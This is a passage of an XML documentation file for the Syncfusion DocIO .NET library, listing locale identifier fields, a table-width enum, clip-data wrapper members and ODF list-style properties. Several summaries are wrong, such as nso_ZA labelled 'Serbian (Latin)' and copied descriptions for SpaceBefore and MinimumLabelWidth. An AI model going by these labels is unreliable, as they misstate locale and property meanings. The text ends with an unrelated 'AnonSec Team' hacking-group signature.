        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.nso_ZA">
            <summary>
            Serbian (Latin).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.tn_ZA">
            <summary>
            Tswana.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.sd_Arab_PK">
            <summary>
            Sindhi - Pakistan.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.sd_Deva_IN">
            <summary>
            Sindhi - India.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.si_LK">
            <summary>
            Sinhalese - Sri Lanka.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.sk_SK">
            <summary>
            Slovak.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.sl_SI">
            <summary>
            Slovenian.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.so_SO">
            <summary>
            Somali.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.es_AR">
            <summary>
            Spanish - Argentina.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.es_BO">
            <summary>
            Spanish - Bolivia.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.es_CL">
            <summary>
            Spanish - Chile.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.es_CO">
            <summary>
            Spanish - Colombia.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.es_CR">
            <summary>
            Spanish - Costa Rica.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.es_DO">
            <summary>
            Spanish - Dominican Republic.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.es_EC">
            <summary>
            Spanish - Ecuador.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.es_SV">
            <summary>
            Spanish - El Salvador.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.es_GT">
            <summary>
            Spanish - Guatemala.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.es_HN">
            <summary>
            Spanish - Honduras.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.es_MX">
            <summary>
            Spanish - Mexico.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.es_NI">
            <summary>
            Spanish - Nicaragua.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.es_PA">
            <summary>
            Spanish - Panama.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.es_PY">
            <summary>
            Spanish - Paraguay.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.es_PE">
            <summary>
            Spanish - Peru.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.es_PR">
            <summary>
            Spanish - Puerto Rico.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.es_ES">
            <summary>
            Spanish - International Sort.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.es_ES_tradnl">
            <summary>
            Spanish - Spain (Traditional Sort).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.es_US">
            <summary>
            Spanish - United States.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.es_UY">
            <summary>
            Spanish - Uruguay.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.es_VE">
            <summary>
            Spanish - Venezuela.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.st_ZA">
            <summary>
            Sutu.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.sw_KE">
            <summary>
            Swahili.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.sv_FI">
            <summary>
            Swedish - Finland.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.sv_SE">
            <summary>
            Swedish.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.syr_SY">
            <summary>
            Syriac.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.tg_Cyrl_TJ">
            <summary>
            Tajik.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.tzm_Arab_MA">
            <summary>
            Tamazight.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.tzm_Latn_DZ">
            <summary>
            Tamazight (Latin).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ta_IN">
            <summary>
            Tamil.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.tt_RU">
            <summary>
            Tatar.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.te_IN">
            <summary>
            Telugu.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.th_TH">
            <summary>
            Thai.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.bo_CN">
            <summary>
            Tibetan (PRC).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ti_ER">
            <summary>
            Tigrigna (Eritrea).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ti_ET">
            <summary>
            Tigrigna (Ethiopia).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ts_ZA">
            <summary>
            Tsonga.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.tr_TR">
            <summary>
            Turkish.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.tk_TM">
            <summary>
            Turkmen.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ug_CN">
            <summary>
            Uighur - China.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.uk_UA">
            <summary>
            Ukrainian.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.hsb_DE">
            <summary>
            Sorbian.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ur_PK">
            <summary>
            Urdu.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.uz_Cyrl_UZ">
            <summary>
            Uzbek (Cyrillic).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.uz_Latn_UZ">
            <summary>
            Uzbek (Latin).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ve_ZA">
            <summary>
            Venda.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.vi_VN">
            <summary>
            Vietnamese.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.cy_GB">
            <summary>
            Welsh.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.wo_SN">
            <summary>
            Wolof.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.sah_RU">
            <summary>
            Yakut.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ii_CN">
            <summary>
            Yi.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.yi_Hebr">
            <summary>
            Yiddish.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.yo_NG">
            <summary>
            Yoruba.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ja_JP">
            <summary>
            Japanese.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.FtsWidth">
            <summary>
            Specifies preferred width type
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FtsWidth.None">
            <summary>
            No Preffered Width
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FtsWidth.Auto">
            <summary>
            Preferred table width specified as Auto
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FtsWidth.Percentage">
            <summary>
            Preferred table width specified in percentage
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FtsWidth.Point">
            <summary>
            Preferred table width specified in points
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.Utilities.CLIPDATA">
            <summary>
            Specifies structure of the clipped data.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.Utilities.CLIPDATA.uintSize">
            <summary>
            Size of the data.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.Utilities.CLIPDATA.intPtrClipData">
            <summary>
            Pointer to the data.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.Utilities.CLIPDATA.intClipFmt">
            <summary>
            Format of the data.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.Utilities.ClipDataWrapper">
            <summary>
            Represents Clip data wrapper class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.Utilities.ClipDataWrapper.Read(Syncfusion.CompoundFile.DocIO.Native.PROPVARIANT)">
            <summary>
            Reads the specified <see cref="T:Syncfusion.CompoundFile.DocIO.Native.PROPVARIANT">PROPVARIANT</see> variable.
            </summary>
            <param name="propVar">The PROPVARIANT variable.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Utilities.ClipDataWrapper.Read(System.String)">
            <summary>
            Reads the specified data.
            </summary>
            <param name="data">The data.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Utilities.ClipDataWrapper.Write(Syncfusion.CompoundFile.DocIO.Native.PROPVARIANT)">
            <summary>
            Writes the specified <see cref="T:Syncfusion.CompoundFile.DocIO.Native.PROPVARIANT">PROPVARIANT</see> variable.
            </summary>
            <param name="propVar">The PROPVARIANT variable.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Utilities.ClipDataWrapper.WriteToString">
            <summary>
            Writes to string.
            </summary>
            <returns>
            Returns the updated string.
            </returns>
        </member>
        <member name="P:ODF.Base.ODFImplementation.ListLevelProperties.BulletCharacter">
            <summary>
            Gets or sets bullet character pattern for the specified list level.
            </summary>
        </member>
        <member name="P:ODF.Base.ODFImplementation.ListLevelProperties.NumberSufix">
            <summary>
            Gets or sets the string inserted after the number for the specified list level.
            </summary>
        </member>
        <member name="P:ODF.Base.ODFImplementation.ListLevelProperties.NumberPrefix">
            <summary>
            Gets or sets the string inserted before the number for the specified list level.
            </summary>
        </member>
        <member name="P:ODF.Base.ODFImplementation.ListLevelProperties.SpaceBefore">
            <summary>
            Gets or sets the string inserted before the number for the specified list level.
            </summary>
        </member>
        <member name="P:ODF.Base.ODFImplementation.ListLevelProperties.MinimumLabelWidth">
            <summary>
            Gets or sets the string inserted before the number for the specified list level.
            </summary>
        </member>
        <member name="P:ODF.Base.ODFImplementation.ListLevelProperties.LeftMargin">
            <summary>
            Gets or sets the left margin.
            </summary>
        </member>
        <member name="P:ODF.Base.ODFImplementation.ListLevelProperties.TextIndent">
            <summary>
            Gets or sets the text indent.
            </summary>
        </member>
        <member name="P:ODF.Base.ODFImplementation.ListLevelProperties.TextAlignment">
            <summary>
            Gets/Sets the list level text alignment property
            </summary>
        </member>
        <member name="M:ODF.Base.ODFImplementation.OListStyle.Close">
            <summary>
            Closes the instances used in OListStyle
            </summary>
        </member>
        <member name="P:ODF.Base.ODFImplementation.OListStyle.Name">
            <summary>
            Gets or sets the name for the list style.
            </summary>
            <value>The <b>string</b> that represents the style name.</value>
        </member>
    </members>
</doc>

Anon7 - 2022
AnonSec Team